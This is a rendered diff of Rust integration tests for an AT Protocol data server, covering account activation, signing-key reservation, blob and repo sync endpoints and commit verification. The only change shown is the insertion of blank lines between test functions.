325 #[tokio::test] 326 async fn test_check_account_status_no_auth() { 327 let client = client(); ··· 337 let body: Value = res.json().await.expect("Response was not valid JSON"); 338 assert_eq!(body["error"], "AuthenticationRequired"); 339 } 340 + 341 #[tokio::test] 342 async fn test_activate_account_success() { 343 let client = client(); ··· 353 .expect("Failed to send request"); 354 assert_eq!(res.status(), StatusCode::OK); 355 } 356 + 357 #[tokio::test] 358 async fn test_activate_account_no_auth() { 359 let client = client(); ··· 367 .expect("Failed to send request"); 368 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 369 } 370 + 371 #[tokio::test] 372 async fn test_deactivate_account_success() { 373 let client = client();
+10
tests/signing_key.rs
··· 4 use serde_json::{json, Value}; 5 use sqlx::PgPool; 6 use helpers::verify_new_account; 7 async fn get_pool() -> PgPool { 8 let conn_str = common::get_db_connection_string().await; 9 sqlx::postgres::PgPoolOptions::new() ··· 12 .await 13 .expect("Failed to connect to test database") 14 } 15 #[tokio::test] 16 async fn test_reserve_signing_key_without_did() { 17 let client = common::client(); ··· 34 "Signing key should be in did:key format with multibase prefix" 35 ); 36 } 37 #[tokio::test] 38 async fn test_reserve_signing_key_with_did() { 39 let client = common::client(); ··· 63 assert_eq!(row.did.as_deref(), Some(target_did)); 64 assert_eq!(row.public_key_did_key, signing_key); 65 } 66 #[tokio::test] 67 async fn test_reserve_signing_key_stores_private_key() { 68 let client = common::client(); ··· 91 assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet"); 92 assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future"); 93 } 94 #[tokio::test] 95 async fn test_reserve_signing_key_unique_keys() { 96 let client = common::client(); ··· 121 let key2 = body2["signingKey"].as_str().unwrap(); 122 assert_ne!(key1, key2, "Each call should generate a unique signing key"); 123 } 124 #[tokio::test] 125 async fn test_reserve_signing_key_is_public() { 126 let client = common::client(); ··· 140 "reserveSigningKey should work without authentication" 141 ); 142 } 143 #[tokio::test] 144 async fn test_create_account_with_reserved_signing_key() { 145 let client = common::client(); ··· 190 "Reserved key should be marked as used" 191 ); 192 } 193 #[tokio::test] 194 async fn test_create_account_with_invalid_signing_key() { 195 let client = common::client(); ··· 213 let body: Value = res.json().await.unwrap(); 214 assert_eq!(body["error"], "InvalidSigningKey"); 215 } 216 #[tokio::test] 217 async fn test_create_account_cannot_reuse_signing_key() { 218 let client = common::client(); ··· 268 .unwrap() 269 .contains("already used")); 270 } 271 #[tokio::test] 272 async fn test_reserved_key_tokens_work() { 273 let client = common::client();
··· 4 use serde_json::{json, Value}; 5 use sqlx::PgPool; 6 use helpers::verify_new_account; 7 + 8 async fn get_pool() -> PgPool { 9 let conn_str = common::get_db_connection_string().await; 10 sqlx::postgres::PgPoolOptions::new() ··· 13 .await 14 .expect("Failed to connect to test database") 15 } 16 + 17 #[tokio::test] 18 async fn test_reserve_signing_key_without_did() { 19 let client = common::client(); ··· 36 "Signing key should be in did:key format with multibase prefix" 37 ); 38 } 39 + 40 #[tokio::test] 41 async fn test_reserve_signing_key_with_did() { 42 let client = common::client(); ··· 66 assert_eq!(row.did.as_deref(), Some(target_did)); 67 assert_eq!(row.public_key_did_key, signing_key); 68 } 69 + 70 #[tokio::test] 71 async fn test_reserve_signing_key_stores_private_key() { 72 let client = common::client(); ··· 95 assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet"); 96 assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future"); 97 } 98 + 99 #[tokio::test] 100 async fn test_reserve_signing_key_unique_keys() { 101 let client = common::client(); ··· 126 let key2 = body2["signingKey"].as_str().unwrap(); 127 assert_ne!(key1, key2, "Each call should generate a unique signing key"); 128 } 129 + 130 #[tokio::test] 131 async fn test_reserve_signing_key_is_public() { 132 let client = common::client(); ··· 146 "reserveSigningKey should work without authentication" 147 ); 148 } 149 + 150 #[tokio::test] 151 async fn test_create_account_with_reserved_signing_key() { 152 let client = common::client(); ··· 197 "Reserved key should be marked as used" 198 ); 199 } 200 + 201 #[tokio::test] 202 async fn test_create_account_with_invalid_signing_key() { 203 let client = common::client(); ··· 221 let body: Value = res.json().await.unwrap(); 222 assert_eq!(body["error"], "InvalidSigningKey"); 223 } 224 + 225 #[tokio::test] 226 async fn test_create_account_cannot_reuse_signing_key() { 227 let client = common::client(); ··· 277 .unwrap() 278 .contains("already used")); 279 } 280 + 281 #[tokio::test] 282 async fn test_reserved_key_tokens_work() { 283 let client = common::client();
+4
tests/sync_blob.rs
··· 3 use reqwest::StatusCode; 4 use reqwest::header; 5 use serde_json::Value; 6 #[tokio::test] 7 async fn test_list_blobs_success() { 8 let client = client(); ··· 35 let cids = body["cids"].as_array().unwrap(); 36 assert!(!cids.is_empty()); 37 } 38 #[tokio::test] 39 async fn test_list_blobs_not_found() { 40 let client = client(); ··· 52 let body: Value = res.json().await.expect("Response was not valid JSON"); 53 assert_eq!(body["error"], "RepoNotFound"); 54 } 55 #[tokio::test] 56 async fn test_get_blob_success() { 57 let client = client(); ··· 91 let body = res.text().await.expect("Failed to get body"); 92 assert_eq!(body, blob_content); 93 } 94 #[tokio::test] 95 async fn test_get_blob_not_found() { 96 let client = client();
··· 3 use reqwest::StatusCode; 4 use reqwest::header; 5 use serde_json::Value; 6 + 7 #[tokio::test] 8 async fn test_list_blobs_success() { 9 let client = client(); ··· 36 let cids = body["cids"].as_array().unwrap(); 37 assert!(!cids.is_empty()); 38 } 39 + 40 #[tokio::test] 41 async fn test_list_blobs_not_found() { 42 let client = client(); ··· 54 let body: Value = res.json().await.expect("Response was not valid JSON"); 55 assert_eq!(body["error"], "RepoNotFound"); 56 } 57 + 58 #[tokio::test] 59 async fn test_get_blob_success() { 60 let client = client(); ··· 94 let body = res.text().await.expect("Failed to get body"); 95 assert_eq!(body, blob_content); 96 } 97 + 98 #[tokio::test] 99 async fn test_get_blob_not_found() { 100 let client = client();
+14
tests/sync_deprecated.rs
··· 4 use helpers::*; 5 use reqwest::StatusCode; 6 use serde_json::Value; 7 #[tokio::test] 8 async fn test_get_head_success() { 9 let client = client(); ··· 23 let root = body["root"].as_str().unwrap(); 24 assert!(root.starts_with("bafy"), "Root CID should be a CID"); 25 } 26 #[tokio::test] 27 async fn test_get_head_not_found() { 28 let client = client(); ··· 40 assert_eq!(body["error"], "HeadNotFound"); 41 assert!(body["message"].as_str().unwrap().contains("Could not find root")); 42 } 43 #[tokio::test] 44 async fn test_get_head_missing_param() { 45 let client = client(); ··· 53 .expect("Failed to send request"); 54 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 55 } 56 #[tokio::test] 57 async fn test_get_head_empty_did() { 58 let client = client(); ··· 69 let body: Value = res.json().await.expect("Response was not valid JSON"); 70 assert_eq!(body["error"], "InvalidRequest"); 71 } 72 #[tokio::test] 73 async fn test_get_head_whitespace_did() { 74 let client = client(); ··· 83 .expect("Failed to send request"); 84 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 85 } 86 #[tokio::test] 87 async fn test_get_head_changes_after_record_create() { 88 let client = client(); ··· 112 let head2 = body2["root"].as_str().unwrap().to_string(); 113 assert_ne!(head1, head2, "Head CID should change after record creation"); 114 } 115 #[tokio::test] 116 async fn test_get_checkout_success() { 117 let client = client(); ··· 137 assert!(!body.is_empty(), "CAR file should not be empty"); 138 assert!(body.len() > 50, "CAR file should contain actual data"); 139 } 140 #[tokio::test] 141 async fn test_get_checkout_not_found() { 142 let client = client(); ··· 153 let body: Value = res.json().await.expect("Response was not valid JSON"); 154 assert_eq!(body["error"], "RepoNotFound"); 155 } 156 #[tokio::test] 157 async fn test_get_checkout_missing_param() { 158 let client = client(); ··· 166 .expect("Failed to send request"); 167 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 168 } 169 #[tokio::test] 170 async fn test_get_checkout_empty_did() { 171 let client = client(); ··· 180 .expect("Failed to send request"); 181 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 182 } 183 #[tokio::test] 184 async fn test_get_checkout_empty_repo() { 185 let client = client(); ··· 197 let body = res.bytes().await.expect("Failed to get body"); 198 assert!(!body.is_empty(), "Even empty repo should return CAR header"); 199 } 200 #[tokio::test] 201 async fn test_get_checkout_includes_multiple_records() { 202 let client = client(); ··· 218 let body = res.bytes().await.expect("Failed to get body"); 219 assert!(body.len() > 500, "CAR file with 5 records should be larger"); 220 } 221 #[tokio::test] 222 async fn test_get_head_matches_latest_commit() { 223 let client = client(); ··· 246 let latest_cid = latest_body["cid"].as_str().unwrap(); 247 assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid"); 248 } 249 #[tokio::test] 250 async fn test_get_checkout_car_header_valid() { 251 let client = client();
··· 4 use helpers::*; 5 use reqwest::StatusCode; 6 use serde_json::Value; 7 + 8 #[tokio::test] 9 async fn test_get_head_success() { 10 let client = client(); ··· 24 let root = body["root"].as_str().unwrap(); 25 assert!(root.starts_with("bafy"), "Root CID should be a CID"); 26 } 27 + 28 #[tokio::test] 29 async fn test_get_head_not_found() { 30 let client = client(); ··· 42 assert_eq!(body["error"], "HeadNotFound"); 43 assert!(body["message"].as_str().unwrap().contains("Could not find root")); 44 } 45 + 46 #[tokio::test] 47 async fn test_get_head_missing_param() { 48 let client = client(); ··· 56 .expect("Failed to send request"); 57 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 58 } 59 + 60 #[tokio::test] 61 async fn test_get_head_empty_did() { 62 let client = client(); ··· 73 let body: Value = res.json().await.expect("Response was not valid JSON"); 74 assert_eq!(body["error"], "InvalidRequest"); 75 } 76 + 77 #[tokio::test] 78 async fn test_get_head_whitespace_did() { 79 let client = client(); ··· 88 .expect("Failed to send request"); 89 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 90 } 91 + 92 #[tokio::test] 93 async fn test_get_head_changes_after_record_create() { 94 let client = client(); ··· 118 let head2 = body2["root"].as_str().unwrap().to_string(); 119 assert_ne!(head1, head2, "Head CID should change after record creation"); 120 } 121 + 122 #[tokio::test] 123 async fn test_get_checkout_success() { 124 let client = client(); ··· 144 assert!(!body.is_empty(), "CAR file should not be empty"); 145 assert!(body.len() > 50, "CAR file should contain actual data"); 146 } 147 + 148 #[tokio::test] 149 async fn test_get_checkout_not_found() { 150 let client = client(); ··· 161 let body: Value = res.json().await.expect("Response was not valid JSON"); 162 assert_eq!(body["error"], "RepoNotFound"); 163 } 164 + 165 #[tokio::test] 166 async fn test_get_checkout_missing_param() { 167 let client = client(); ··· 175 .expect("Failed to send request"); 176 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 177 } 178 + 179 #[tokio::test] 180 async fn test_get_checkout_empty_did() { 181 let client = client(); ··· 190 .expect("Failed to send request"); 191 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 192 } 193 + 194 #[tokio::test] 195 async fn test_get_checkout_empty_repo() { 196 let client = client(); ··· 208 let body = res.bytes().await.expect("Failed to get body"); 209 assert!(!body.is_empty(), "Even empty repo should return CAR header"); 210 } 211 + 212 #[tokio::test] 213 async fn test_get_checkout_includes_multiple_records() { 214 let client = client(); ··· 230 let body = res.bytes().await.expect("Failed to get body"); 231 assert!(body.len() > 500, "CAR file with 5 records should be larger"); 232 } 233 + 234 #[tokio::test] 235 async fn test_get_head_matches_latest_commit() { 236 let client = client(); ··· 259 let latest_cid = latest_body["cid"].as_str().unwrap(); 260 assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid"); 261 } 262 + 263 #[tokio::test] 264 async fn test_get_checkout_car_header_valid() { 265 let client = client();
+18
tests/sync_repo.rs
··· 5 use reqwest::StatusCode; 6 use reqwest::header; 7 use serde_json::{Value, json}; 8 #[tokio::test] 9 async fn test_get_latest_commit_success() { 10 let client = client(); ··· 24 assert!(body["cid"].is_string()); 25 assert!(body["rev"].is_string()); 26 } 27 #[tokio::test] 28 async fn test_get_latest_commit_not_found() { 29 let client = client(); ··· 41 let body: Value = res.json().await.expect("Response was not valid JSON"); 42 assert_eq!(body["error"], "RepoNotFound"); 43 } 44 #[tokio::test] 45 async fn test_get_latest_commit_missing_param() { 46 let client = client(); ··· 54 .expect("Failed to send request"); 55 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 56 } 57 #[tokio::test] 58 async fn test_list_repos() { 59 let client = client(); ··· 76 assert!(repo["head"].is_string()); 77 assert!(repo["active"].is_boolean()); 78 } 79 #[tokio::test] 80 async fn test_list_repos_with_limit() { 81 let client = client(); ··· 97 let repos = body["repos"].as_array().unwrap(); 98 assert!(repos.len() <= 2); 99 } 100 #[tokio::test] 101 async fn test_list_repos_pagination() { 102 let client = client(); ··· 135 assert_ne!(repos[0]["did"], repos2[0]["did"]); 136 } 137 } 138 #[tokio::test] 139 async fn test_get_repo_status_success() { 140 let client = client(); ··· 155 assert_eq!(body["active"], true); 156 assert!(body["rev"].is_string()); 157 } 158 #[tokio::test] 159 async fn test_get_repo_status_not_found() { 160 let client = client(); ··· 172 let body: Value = res.json().await.expect("Response was not valid JSON"); 173 assert_eq!(body["error"], "RepoNotFound"); 174 } 175 #[tokio::test] 176 async fn test_notify_of_update() { 177 let client = client(); ··· 187 .expect("Failed to send request"); 188 assert_eq!(res.status(), StatusCode::OK); 189 } 190 #[tokio::test] 191 async fn test_request_crawl() { 192 let client = client(); ··· 202 .expect("Failed to send request"); 203 assert_eq!(res.status(), StatusCode::OK); 204 } 205 #[tokio::test] 206 async fn test_get_repo_success() { 207 let client = client(); ··· 245 let body = res.bytes().await.expect("Failed to get body"); 246 assert!(!body.is_empty()); 247 } 248 #[tokio::test] 249 async fn test_get_repo_not_found() { 250 let client = client(); ··· 262 let body: Value = res.json().await.expect("Response was not valid JSON"); 263 assert_eq!(body["error"], "RepoNotFound"); 264 } 265 #[tokio::test] 266 async fn test_get_record_sync_success() { 267 let client = client(); ··· 312 let body = res.bytes().await.expect("Failed to get body"); 313 assert!(!body.is_empty()); 314 } 315 #[tokio::test] 316 async fn test_get_record_sync_not_found() { 317 let client = client(); ··· 334 let body: Value = res.json().await.expect("Response was not valid JSON"); 335 assert_eq!(body["error"], "RecordNotFound"); 336 } 337 #[tokio::test] 338 async fn test_get_blocks_success() { 339 let client = client(); ··· 369 Some("application/vnd.ipld.car") 370 ); 371 } 372 #[tokio::test] 373 async fn test_get_blocks_not_found() { 374 let client = client(); ··· 383 .expect("Failed to send request"); 384 assert_eq!(res.status(), StatusCode::NOT_FOUND); 385 } 386 #[tokio::test] 387 async fn test_sync_record_lifecycle() { 388 let client = client(); ··· 491 "Second post should still be accessible" 492 ); 493 } 494 #[tokio::test] 495 async fn test_sync_repo_export_lifecycle() { 496 let client = client();
··· 5 use reqwest::StatusCode; 6 use reqwest::header; 7 use serde_json::{Value, json}; 8 + 9 #[tokio::test] 10 async fn test_get_latest_commit_success() { 11 let client = client(); ··· 25 assert!(body["cid"].is_string()); 26 assert!(body["rev"].is_string()); 27 } 28 + 29 #[tokio::test] 30 async fn test_get_latest_commit_not_found() { 31 let client = client(); ··· 43 let body: Value = res.json().await.expect("Response was not valid JSON"); 44 assert_eq!(body["error"], "RepoNotFound"); 45 } 46 + 47 #[tokio::test] 48 async fn test_get_latest_commit_missing_param() { 49 let client = client(); ··· 57 .expect("Failed to send request"); 58 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 59 } 60 + 61 #[tokio::test] 62 async fn test_list_repos() { 63 let client = client(); ··· 80 assert!(repo["head"].is_string()); 81 assert!(repo["active"].is_boolean()); 82 } 83 + 84 #[tokio::test] 85 async fn test_list_repos_with_limit() { 86 let client = client(); ··· 102 let repos = body["repos"].as_array().unwrap(); 103 assert!(repos.len() <= 2); 104 } 105 + 106 #[tokio::test] 107 async fn test_list_repos_pagination() { 108 let client = client(); ··· 141 assert_ne!(repos[0]["did"], repos2[0]["did"]); 142 } 143 } 144 + 145 #[tokio::test] 146 async fn test_get_repo_status_success() { 147 let client = client(); ··· 162 assert_eq!(body["active"], true); 163 assert!(body["rev"].is_string()); 164 } 165 + 166 #[tokio::test] 167 async fn test_get_repo_status_not_found() { 168 let client = client(); ··· 180 let body: Value = res.json().await.expect("Response was not valid JSON"); 181 assert_eq!(body["error"], "RepoNotFound"); 182 } 183 + 184 #[tokio::test] 185 async fn test_notify_of_update() { 186 let client = client(); ··· 196 .expect("Failed to send request"); 197 assert_eq!(res.status(), StatusCode::OK); 198 } 199 + 200 #[tokio::test] 201 async fn test_request_crawl() { 202 let client = client(); ··· 212 .expect("Failed to send request"); 213 assert_eq!(res.status(), StatusCode::OK); 214 } 215 + 216 #[tokio::test] 217 async fn test_get_repo_success() { 218 let client = client(); ··· 256 let body = res.bytes().await.expect("Failed to get body"); 257 assert!(!body.is_empty()); 258 } 259 + 260 #[tokio::test] 261 async fn test_get_repo_not_found() { 262 let client = client(); ··· 274 let body: Value = res.json().await.expect("Response was not valid JSON"); 275 assert_eq!(body["error"], "RepoNotFound"); 276 } 277 + 278 #[tokio::test] 279 async fn test_get_record_sync_success() { 280 let client = client(); ··· 325 let body = res.bytes().await.expect("Failed to get body"); 326 assert!(!body.is_empty()); 327 } 328 + 329 #[tokio::test] 330 async fn test_get_record_sync_not_found() { 331 let client = client(); ··· 348 let body: Value = res.json().await.expect("Response was not valid JSON"); 349 assert_eq!(body["error"], "RecordNotFound"); 350 } 351 + 352 #[tokio::test] 353 async fn test_get_blocks_success() { 354 let client = client(); ··· 384 Some("application/vnd.ipld.car") 385 ); 386 } 387 + 388 #[tokio::test] 389 async fn test_get_blocks_not_found() { 390 let client = client(); ··· 399 .expect("Failed to send request"); 400 assert_eq!(res.status(), StatusCode::NOT_FOUND); 401 } 402 + 403 #[tokio::test] 404 async fn test_sync_record_lifecycle() { 405 let client = client(); ··· 508 "Second post should still be accessible" 509 ); 510 } 511 + 512 #[tokio::test] 513 async fn test_sync_repo_export_lifecycle() { 514 let client = client();
+3
tests/verify_live_commit.rs
··· 3 use std::collections::HashMap; 4 use std::str::FromStr; 5 mod common; 6 #[tokio::test] 7 async fn test_verify_live_commit() { 8 let client = reqwest::Client::new(); ··· 51 } 52 } 53 } 54 fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> { 55 #[derive(serde::Serialize)] 56 struct UnsignedCommit<'a> { ··· 72 }; 73 serde_ipld_dagcbor::to_vec(&unsigned).unwrap() 74 } 75 fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> { 76 use std::io::Read; 77 fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {
··· 3 use std::collections::HashMap; 4 use std::str::FromStr; 5 mod common; 6 + 7 #[tokio::test] 8 async fn test_verify_live_commit() { 9 let client = reqwest::Client::new(); ··· 52 } 53 } 54 } 55 + 56 fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> { 57 #[derive(serde::Serialize)] 58 struct UnsignedCommit<'a> { ··· 74 }; 75 serde_ipld_dagcbor::to_vec(&unsigned).unwrap() 76 } 77 + 78 fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> { 79 use std::io::Read; 80 fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {